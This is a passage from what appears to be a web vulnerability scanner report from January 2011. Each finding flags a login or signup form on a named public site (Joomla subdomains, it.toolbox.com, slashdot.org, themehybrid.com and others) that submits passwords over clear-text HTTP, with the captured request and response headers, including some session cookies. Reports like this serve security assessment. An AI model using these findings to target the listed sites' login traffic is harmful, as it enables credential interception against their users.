User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.34. http://it.toolbox.com/blogs/database-talk previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/database-talk

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.35. http://it.toolbox.com/blogs/db2luw previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/db2luw

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.36. http://it.toolbox.com/blogs/db2zos previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/db2zos

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.37. http://it.toolbox.com/blogs/elsua previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/elsua

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.38. http://it.toolbox.com/blogs/juice-analytics previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/juice-analytics

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.39. http://it.toolbox.com/blogs/minimalit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/minimalit

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.40. http://it.toolbox.com/blogs/penguinista-databasiensis previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/penguinista-databasiensis

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.41. http://it.toolbox.com/blogs/ppmtoday previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/ppmtoday

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.42. http://joomlacode.org/gf/account/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/account/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://joomlacode.org/gf/account/?action=UserAddAction

The form contains the following password fields:

password
password_confirm

Request

GET /gf/account/?action=UserAdd HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.3.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:36:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</p>
<form action="/gf/account/?action=UserAddAction" method="POST">
   <table border="0">
...[SNIP]...
<br />
           <input type="password" name="password" maxlength="32" value="" /></td>
...[SNIP]...
<br />
           <input type="password" name="password_confirm" maxlength="32" value="" /></td>
...[SNIP]...

6.43. http://my.joomla.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.joomla.org/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: my.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9eaf6601670c0ef4fb11c453b34b19f8=ad1bd55b950dc34700e6681bcc93141e; path=/
Last-Modified: Mon, 24 Jan 2011 22:43:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p>
       <form action="index.php" method="post" name="login" id="form-login">
   <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" class="inputbox" size="18" alt="Password" id="passwd" />
       </p>
...[SNIP]...

6.44. http://netvouz.com/action/submitBookmark previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://netvouz.com
Path:	/action/submitBookmark

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://netvouz.com/action/submitBookmark

The form contains the following password field:

password

Request

GET /action/submitBookmark HTTP/1.1
Host: netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:42 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=0000e0ie9rZuNgE43J-9RQD-aOC:-1; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5096

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</p>


                       <form name="submitBookmarkForm" method="post" action="/action/submitBookmark">
               <table>
...[SNIP]...
<td><input type="password" name="password" maxlength="15" size="18" tabindex="2" value="" /></td>
...[SNIP]...

6.45. http://newsguy.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://newsguy.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://newsguy.com/javascript:LoginNow()

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:34 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07e5e76216ca9266b6006a1955c20780; path=/
Content-Length: 35166
Cache-Control: private
Content-Type: text/html

<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>

<title>Welcome to Newsguy!</title>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" width="283" height="37" style="font-family: Arial; font-size: 80%;">
<form name=loginform method=POST action="javascript:LoginNow()">
<tr>
...[SNIP]...
<td width="77" height="22" align="left">
<input type="password" name="pass" size="8"></td>
...[SNIP]...

6.46. http://people.joomla.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://people.joomla.org/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div class="highslide-body">

<form action="/index.php"
   method="post" name="cd_login_form_login" id="cd_login_form_login">
<fieldset class="input">
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox"
   size="18"
   title="Password"
   alt="password" /></p>
...[SNIP]...

6.47. http://people.joomla.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://people.joomla.org/people.html

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>

<form action="/people.html" method="post" name="login" id="form-login" >
<label>
...[SNIP]...
<br />
<input type="password" class="inputbox frontlogin" name="passwd" id="password" />
</label>
...[SNIP]...

6.48. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://people.joomla.org/groups.html

The form contains the following password field:

passwd

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=4f8b70569285b3c4a1fb98ed7e94a635; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html; expires=Tue, 25-Jan-2011 22:47:59 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div class="highslide-body">

<form action="/groups.html"
   method="post" name="cd_login_form_login" id="cd_login_form_login">
<fieldset class="input">
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox"
   size="18"
   title="Password"
   alt="password" /></p>
...[SNIP]...

6.49. http://resources.joomla.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://resources.joomla.org/index.php

The form contains the following password field:

passwd

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.50. http://resources.joomla.org/directory/advsearch.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/advsearch.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://resources.joomla.org/directory.html

The form contains the following password field:

passwd

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.51. http://resources.joomla.org/directory/new.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/new.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://resources.joomla.org/directory.html

The form contains the following password field:

passwd

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.52. http://resources.joomla.org/how-to-add-listings.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/how-to-add-listings.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://resources.joomla.org/how-to-add-listings.html

The form contains the following password field:

passwd

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/how-to-add-listings.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.53. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://slashdot.org/login.pl

The form contains the following password field:

upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.54. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://slashdot.org/login.pl

The form contains the following password field:

upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.55. http://spongecell.com/event_list previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spongecell.com
Path:	/event_list

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://spongecell.com/promote/website/login

The form contains the following password field:

Request

GET /event_list HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 200 OK
Cache-Control: no-cache
Content-Length: 10097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...
<div class="column span-10 first last jsLoggedInHide" id="signIn">
<form action="/promote/website/login" id="signInForm" method="post">
<button class="" id="signInButton" style="" type="submit">
...[SNIP]...
<input class="formHelpText textField" formHelpText="email address" id="emailAddressTextField" name="login[name]" size="30" type="text" />
<input class="xformHelpText textField passwordField" formHelpText="password" id="passwordTextField" name="login[password]" size="30" type="password" />

...[SNIP]...

6.56. http://themehybrid.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://themehybrid.com/blog/wp-login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.2.10.1295921862;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:20:45 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10979

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<div class="column column-2 column-log-in">
               <form class="log-in" action="http://themehybrid.com/blog/wp-login.php" method="post">
                   <p class="text-input">
...[SNIP]...
</label>
                       <input class="field" type="password" name="pwd" id="pwd" size="23" />
                   </p>
...[SNIP]...

6.57. http://themehybrid.com/themes/shadow previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/themes/shadow

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://themehybrid.com/blog/wp-login.php

The form contains the following password field:

Request

GET /themes/shadow HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:05:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=e59ccbea599b13d912fb7478431f66b7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11457

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<div class="column column-2 column-log-in">
               <form class="log-in" action="http://themehybrid.com/blog/wp-login.php" method="post">
                   <p class="text-input">
...[SNIP]...
</label>
                       <input class="field" type="password" name="pwd" id="pwd" size="23" />
                   </p>
...[SNIP]...

6.58. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://venedet.michnica.net/index.php/component/comprofiler/login

The form contains the following password field:

passwd

Request

GET /index.php/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: fa5a1b42d3949309610b52593e36fa6f=1841b8d77a50e80e7a37fed80c5175b4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sk-sk" lang="sk-sk" dir=
...[SNIP]...
</h3>
